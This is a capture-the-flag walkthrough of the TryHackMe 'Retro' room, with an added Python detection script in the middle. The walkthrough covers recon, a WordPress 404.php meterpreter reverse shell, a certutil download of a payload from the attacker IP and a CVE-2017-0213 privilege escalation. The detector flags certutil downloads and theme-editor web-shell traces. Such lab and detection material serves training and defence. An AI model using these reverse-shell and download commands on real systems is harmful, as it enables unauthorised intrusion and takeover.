This walkthrough will go over the Retro room found on TryHackMe. The objective behind this room is to use a bit of passive recon to find a set of credentials in order to RDP into the box, identify a vulnerability in the
(CVE-2017-0213), and privesc to
Step 1: What's Out There?
nmap -sC -sV -p- -Pn retro.thm --min-rate=1000
Looks like we have a webserver and an RDP session open. Let's check out what the web server can offer us.
We are greeted by a Microsoft IIS page. We'll use ffuf to enumerate directories.
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://retro.thm/FUZZ -fs 703
Nice, we discovered a directory called /retro. Let's go to it.
Step 3: Finding Credentials
We discovered a blog that seems to be run by a username
After downloading and viewing the Comments RSS data, we discovered text that might be a potential password.
Taking this information and plugging it into the Site Admin link allows us to log in to the WordPress admin panel.
Step 4: Initial Foothold
Based on my experience getting a reverse shell through WordPress, we need to modify the theme's 404.php file and inject our generated shell code. We can generate the payload with
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f raw -o retro_shell.php
Now let's start our handler so we can catch the shell once it executes. In msfconsole:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1337
run
From here we want to copy the contents of retro_shell.php and paste them into 404.php. We can do this by navigating to Appearance > Theme Editor > 404 Template. Delete the existing content of the 404.php file and paste your shell in its place. It should look like this.
Now navigate to the file in your browser (http://retro.thm/retro/wp-content/themes/90s-retro/404.php) and it will drop you into a meterpreter session.
Step 5: Detour
Okay, so for some reason I could not get the meterpreter shell to stabilize with the 404.php route. But, that's alright. Sometimes we have to get creative and approach a problem from a different angle... in the end, we still get the same outcome. Root.
So what I decided to do is RDP into the box with our same credentials and upload a payload, set my handler, and catch it with a stable meterpreter session.
Generate a payload using
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o payload.exe
Start an HTTP Server and transfer it over using
certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
Now we want to set up our listener and catch the shell. Same as before, with a slight modification to the payload:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ATTACKER_IP>
set LPORT 1337
run
Run the payload from the victim box and drop it into a meterpreter session.
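From the defender's side, both routes taken in Steps 4 and 5 leave distinctive traces: a POST to the WordPress theme editor followed shortly by a direct request to a theme .php file, and certutil being used with -urlcache to fetch a file over HTTP. The following is an added example (not part of the original walkthrough) that runs simple detection logic over constructed process-creation and access-log lines; the log formats, hostnames and timestamps are assumptions for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not taken from the original post). The first three
# mimic Windows process-creation events; the rest mimic IIS/WordPress access logs.
SAMPLE_EVENTS = [
    r'ProcessCreate User=RETRO\wade Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe"',
    r'ProcessCreate User=RETRO\wade Image=C:\Windows\System32\certutil.exe CommandLine="certutil -hashfile C:\setup.msi SHA256"',
    r'ProcessCreate User=RETRO\wade Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c whoami"',
    '10.13.28.215 - - [07/Aug/2023:12:01:03 +0000] "POST /retro/wp-admin/theme-editor.php HTTP/1.1" 200 512',
    '10.13.28.215 - - [07/Aug/2023:12:01:30 +0000] "GET /retro/wp-content/themes/90s-retro/404.php HTTP/1.1" 200 0',
    '10.13.28.216 - - [07/Aug/2023:12:02:00 +0000] "GET /retro/ HTTP/1.1" 200 7031',
]

# certutil invoked with -urlcache and an http(s) URL: the classic LOLBin download pattern.
CERTUTIL_DOWNLOAD = re.compile(r'certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://', re.I)
# Minimal combined-log-format parser: client IP, timestamp, method and request path.
ACCESS_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\w+) (?P<path>\S+)')
THEME_EDITOR = re.compile(r'/wp-admin/theme-editor\.php$')
THEME_PHP = re.compile(r'/wp-content/themes/[^/]+/[^/]+\.php$')
WINDOW = timedelta(minutes=5)  # how long after a theme edit a direct .php hit is suspicious


def detect(events):
    """Return a list of (rule_name, offending_line) tuples for the given log lines."""
    findings = []
    recent_edits = {}  # client IP -> timestamp of its last theme-editor POST
    for line in events:
        if CERTUTIL_DOWNLOAD.search(line):
            findings.append(("certutil_urlcache_download", line))
            continue
        m = ACCESS_LOG.match(line)
        if not m:
            continue  # not an access-log line (e.g. a process event without certutil)
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["method"] == "POST" and THEME_EDITOR.search(m["path"]):
            recent_edits[m["ip"]] = ts  # remember who edited a theme file, and when
        elif THEME_PHP.search(m["path"]):
            # A theme template requested directly, soon after that client edited a theme,
            # is the footprint of the 404.php web-shell technique described above.
            last = recent_edits.get(m["ip"])
            if last is not None and ts - last <= WINDOW:
                findings.append(("theme_edit_then_direct_php_request", line))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```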
Step 6: Privesc
We're going to use Windows Exploit Suggester (WES) to find a way to elevate our privileges. First, we need to pull the system's information in order to do this.
systeminfo > sysinfo.txt
Now we can pull it down to our attack box.
From here we can use WES to find a privesc vector (update the database with --update before running):
./windows-exploit-suggester.py --database 2023-08-07-mssb.xls --sysinfo ~/sysinfo.txt --ostext 'windows 10 64-bit' -l
This build of Windows 10 is vulnerable to a Windows COM privesc, CVE-2017-0213. There's a binary that we can use to automate this exploit for us. Let's download it to our attack box and upload it to our victim. Link to binary here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
Once we get it on our victim box we can run it, then move over to our RDP session and find a new CMD shell spawned with NT AUTHORITY\SYSTEM rights.
Finally... this one was very difficult and time-consuming. I ended up going down multiple rabbit holes and failing to stabilize shells more times than I'd like to admit. But all in all, I can say this box was rewarding and taught me a lot about Windows privesc. I hope you enjoyed this walkthrough, and as always, Happy Hacking.